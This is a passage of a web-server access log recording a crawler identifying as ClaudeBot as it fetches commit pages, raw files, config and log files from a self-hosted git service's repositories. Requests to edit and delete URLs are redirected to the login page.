ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" [Client 216.73.216.188] [Length 10373] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11546] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 216.73.216.188] [Length 21809] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 10967] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 216.73.216.188] [Length 22724] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 12178] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 42671] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 13891] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 123701] [Gzip 13.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom1.png" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2Fpages" [Client 216.73.216.188] [Length 30638] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 216.73.216.188] [Length 11078] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 33622] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 19896] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.csh" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 216.73.216.188] [Length 22711] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom6.png" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 35827] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11564] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 33428] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 12759] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.csh" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 24991] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" [Client 216.73.216.188] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" [Client 216.73.216.188] [Length 10497] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3.12" -[15/Feb/2026:12:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11536] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11771] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11475] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 35618] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 216.73.216.188] [Length 11766] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.Notebook" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2F.venv%2Fbin%2Fhttpx" [Client 216.73.216.188] [Length 19396] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11039] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 13218] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12157] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/watchfiles" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11792] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12762] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 285503] [Gzip 13.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12771] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/watchfiles" -[15/Feb/2026:12:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13021] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 